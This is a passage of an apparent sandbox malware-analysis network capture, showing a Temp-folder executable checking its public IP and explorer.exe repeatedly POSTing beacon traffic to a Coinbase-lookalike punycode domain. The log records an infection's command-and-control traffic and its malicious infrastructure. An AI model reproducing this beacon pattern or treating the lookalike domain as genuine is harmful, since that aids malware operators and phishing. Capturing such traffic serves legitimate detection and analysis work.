92	192.168.2.4	49889	104.16.184.241	80	420	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:41.807845116 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jul 6, 2024 13:28:42.274327040 CEST	534	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:42 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=_5LUlX8Jv2EjJGPUuJDEDXxJzujlGhDnoVfKkDnnHso-1720265322-1.0.1.1-WnsVbth2x5gCfGLP1jJ.Mhl5Gww5S9Mmoaq4m7oApUCYtzBf93DqYrt1i0IYj9BbOI0hzlvoGreyeBOXDAlxHg; path=/; expires=Sat, 06-Jul-24 11:58:42 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 89ef40b7edc132d9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49893	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:44.222148895 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:44.226982117 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:44.962307930 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQse5bUsUFlQ71qiK%2BIb0saghSOoN%2B%2BOLTuysMftN2R8ZHE24MhMbS%2BZVGw7jCArYLoOTBW9TJVgVesImhSdm6R%2BWGM2%2Bc0x4HQ0CZfVUU6bKVtrQXsLvA6i5dwj3jzUXy19SZd45ziqRqo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40c70add4201-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49896	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:45.086632967 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:45.091665030 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:45.789647102 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbtK%2BBJN0CXrjotziS3hCGixov2ZvYvVAfARkHdEujxPN1RrecifmfBrZQYfyUjKkOq1yOkYj5Qg9VwpCORFpQ1NX0iKs6uwhfkJpvbf8qcJYqG6%2Bv7kiZLZX1dvyYumumBYGgDD0KwggQg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40cc5fdd43d7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49900	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:45.914532900 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:45.919430971 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:46.753660917 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wbef2ai5bxNVet%2FlWkySihVb2DuCjYrNHeLvnp714F7kn4MpLpgAL86tLcRz%2FRQgZAm0BoycMUruKdciiTC15EWLhXIbAfIfmM5Jo%2FuniQqEG90iY0HV9lgEcwbB4bo6qHJjRzm8xdP%2FbU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40d19e3c0c82-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49901	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:46.868284941 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:46.874512911 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:47.617403030 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9keYDSCLk18UEDaDQCgkBhopxjHDekHYhj1HXjsfRbZvTTWY43RLzbV13plBQj8jppUxTGkud6bKPmwFI1jaQti61rOAOpeJQYxjdzLf2K6e9YIF0I%2F1%2FoKQMgZcDqoM4e5LZABaE3bbYA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40d78a4742c2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49904	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:47.745851040 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:47.754070997 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:48.485898018 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvZIhArArgp259wBCrmZdMX06bT8eCi%2Bp0f%2Fh4tLMy%2Bisy1VW8c3SlkUrWB5qv%2FCpbzJfnwGrKQrZJHA%2FFfx2i4DhHnJUtUGFOBmPR9pTkK96h01IpWkFmQFb5QShvCvseKi9iOPB6FRPn4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40dd0a097d18-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49906	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:48.614243031 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:48.619786024 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:49.330326080 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZvlITO8Iu3Jj8KpfP%2FGXAxllLOXoZ5e%2Ff9QpC%2FXHybycsT4dnPWB9GgeyURofnFx3yTg6Nr5BcCO7Tz8ZOERYl6iN6oQAYFXf5xgQNcYkLrL8FWKxqRQYQQRZx8mGjLVlErZYDiUd%2FXSZD0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40e26e794398-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49907	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:49.445791960 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:49.450706005 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:50.198432922 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evYmmJB53DHllMYjMHqfklnueRKYPa%2BHWxqTWFsX1XuUIkn7d2Liio7anHWK4pfj%2B6BTBBGF%2FjnDtwmCjjIlM9uq6SyotyT%2FTt5BlfnqbkO0gmTFVE8gNAD%2Bj9rwvHB5nei9IyLkjHRK%2BsY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40e79e3343ee-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49908	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:50.321115017 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:50.325982094 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:51.072787046 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scuphJ96CC%2BLa7ZwMeLQ3YOP65PN0gqc55yeLK%2Fz49BhPlbYqYAiEC00o2loUVEYmEnigE8eYsrST1F8nWVy%2Br87nopY3PudsFm1swFRPanj1kHAbnv8Q8YcDbxTIKR%2FMF1pH4rmE2VCitE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40ed39b441ec-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49909	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:51.211390972 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:51.216211081 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:51.973701954 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLDhko3I90Dd9%2FfDXr6nKWyr70DaBL38kHlNWI4kJZDWv4pcEWXSqhb5fgdn5TE5ZBlOEBrqejrpoYUDB8RNCCReaimEmjmIPLDq6NM3bKQxNGgeBsrRnl4BFt6q5d3%2Bzfl9JlXrqRl%2FWNQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40f2bec241fb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49911	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:52.086477041 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:52.092047930 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:52.810226917 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8njpaJyU7Iv2xtwhyEQ3%2Fbx28pbbzxk%2FtXv%2FRZthv073rEQmKCwTjapKZT7g8c1US7goZ%2BP2HC%2FPl0vZgtS8lQkOz4T6MOMkAUa5K7AkueXXllqkMti35EnVKjdxE32tFGZKXFMxu49Gv8M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40f81c001801-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49912	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:52.930267096 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:52.936156988 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:53.770708084 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uYOYortCLtUj6lQGR9cgEBigEOx5whF20mM9fAGxeeJoV3MJmMc9XdGXW2despEtb%2FKG%2FX5ycqbLq7VaiwiiCupSVWY2DD9OJnsBKVUq%2B4Yj3%2FzhWJdpu%2ByjCAo4mkp0nk1KitffgHY6WtM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40fd5d9a8c5f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49913	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:53.883497000 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:53.888343096 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:54.615864038 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMnuIuYapNXWZPdtfeeLqUyKGxrUHWNN2jHtOmpKG1VOzQcghEXgyYhzrxyLbZLp8UcYiqJwyrY3yj716P%2BlzsyXtxgLUQjlmgOn2Vh3yIqCsAbzL85nP4ekwfAg3NLeoWRkBdiChR6JKT8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41037e57c335-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49915	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:54.727535009 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:54.732469082 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:55.450159073 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xk0eKU2g%2F9yCcRMeLyMFjvRHpT13JOn6V2Cl6zqpQNez66s36TP1heOmT54uHNCJZXhXbCHPWsrNMhzn0gPoiRCdHBXpnallqHcyJp5%2FIg2TNlCgH%2BZ6VBaD4kmnZ5CvBMEVAiSb8QfoFl0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4108acdd43f2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49916	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:55.591739893 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:55.596731901 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:56.340181112 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2F7BLP529FeFk%2B%2BBV8BBYhaBFo3ho6dnsdqStyk8yzSLrZovLKSx%2BiMD0LC4CIeuJxZ6dtTp5mssKYZ7j0Gwi58VFwStQnzmWJm9my0t7hwzTgyGZXaSaC9jUd%2F6YPhQxyTdJlWz79ovPjk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef410e0e8132e4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49917	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:56.461822987 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:56.466818094 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:57.185849905 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxOA8YhicHstKZsI43mXCY%2FbWLj7AIFBm8Vhkc4qErOgniHYAox0KshVdrjV%2BuAWb6%2Bgg4%2B6261HLZLm1PDDb65QGr82fumoG%2FEaPmYxLNKlh9Y2kfKTGhZrdjt1aPhUOLIrONoAHK3%2BjRM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41138a0443c9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49918	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:57.309123039 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:57.318816900 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:58.053399086 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9h3HQL4xBjFieSxJtKjZNkh4Ohe5Xnuv7dAx9kcVf4aGPiGxcwCBRJ%2F4C0pPPTZwo1%2Fvg4CT3gTrP7E1XwHDy2YoQuUnti%2FByc16UF%2F7b%2BMUMwQFZFZr9RgTik3UClp%2BTIbDUy7W6YG09k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4118ec8e4408-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49919	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:58.182972908 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:58.188524008 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:58.874351025 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oLF68PtTlLzcEy7ywvCJp5VgBDVDQoRDdwuDqLsb2Ok78nteQRnIEGy7x%2Bll9ixNHAv3gIduVEU2MzodK7SX3IxckYjXPlWCQYP%2F6rcY6RfAERJQKtHVujXcqOGK5WQDWHOOq6CGDKiQCBU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef411e2fc05e6e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49921	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:58.992696047 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:58.997484922 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:59.805322886 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WQ57QIjr4lUWya4FFfRfJnDrTFJGSO5gpz5D%2BUy%2FcCgOCyxkRD8a%2FYaAh4FJsQbL%2BanL99pjbKslHMZ1bp8jhHUlo0nkaGQYYthktNkFyM69dGyDhwHEXOe5EBtA02%2F3ntrRoTur5ogFnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41235ed70cc4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49922	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:59.933231115 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:59.938119888 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:00.650013924 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2onn74fsGZTtQDVBpGUPB8qPI0P6%2BvxtMC%2BX%2BerLIBVFPBa7smuCu2aSD5Npz0%2BTGHcKKivwnZzKs0MpUGyPHMwYnC%2F1Vv8CGvtO4hWEdD%2BGoey9f3GV1Qrbm8qAUQWBlA3Q4NDspPEBO9c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41293fb6435e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49923	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:00.774224997 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:00.779117107 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
